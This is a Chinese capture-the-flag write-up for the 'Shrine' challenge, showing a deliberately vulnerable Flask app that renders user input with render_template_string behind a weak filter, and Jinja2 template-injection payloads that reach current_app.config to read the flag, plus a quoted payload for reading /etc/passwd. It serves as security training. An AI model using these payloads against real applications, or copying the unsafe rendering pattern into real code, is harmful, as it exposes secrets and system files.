[CTF]攻防世界:Shrin(SSTI)

题目:攻防世界:Shrin(SSTI)

提示:题目代码

bash 复制代码
import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
  1. /shrine/路由接收任意路径参数
  2. render_template_string()直接渲染用户输入
  3. 过滤机制:()被删除,config和self变量被设为None
  4. 无法使用 subclasses()、popen() 等带括号的函数
bash 复制代码
无法使用
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

步骤

1. 利用Flask全局函数访问current_app

Payload: /shrine/{{url_for.globals['current_app'].config.FLAG}}

原理:

url_for 是Flask内置全局函数,无需括号即可访问__globals__ 获取函数的全局变量字典(无括号)current_app

指向当前的Flask应用实例app 通过 current_app.config 访问被"隐藏"的配置

2. 利用get_flashed_messages

替代Payload:

/shrine/{{get_flashed_messages.globals['current_app'].config['FLAG']}}

原理:与url_for类似,利用另一个Flask全局函数绕过限制。

相关推荐
青岑CTF1 天前
攻防世界-Ics-05-胎教版wp
开发语言·安全·web安全·网络安全·php
vortex51 天前
动态漏洞探测:带参 URL 收集与扫描流程优化
web安全·网络安全·渗透测试
合才科技1 天前
【要闻周报】网络安全与数据合规 2-1
安全·web安全
Root_Hacker1 天前
sql注入学习笔记
数据库·sql·web安全·网络安全·oracle·网络攻击模型
青岑CTF1 天前
攻防世界-Web_php_include-胎教版wp
开发语言·安全·web安全·网络安全·php
HaiLang_IT2 天前
网络安全与执法专业【精选选题表】优质选题参考
安全·web安全·php
青岑CTF2 天前
moectf2023-了解你的座驾-胎教版wp
安全·web安全·网络安全
毕设源码-朱学姐2 天前
【开题答辩全过程】以 基于python网络安全知识在线答题系统为例,包含答辩的问题和答案
开发语言·python·web安全
瘾大侠2 天前
HTB赛季10 - Facts
网络·安全·web安全·网络安全
刚刚入门的菜鸟2 天前
php-curl
运维·web安全·php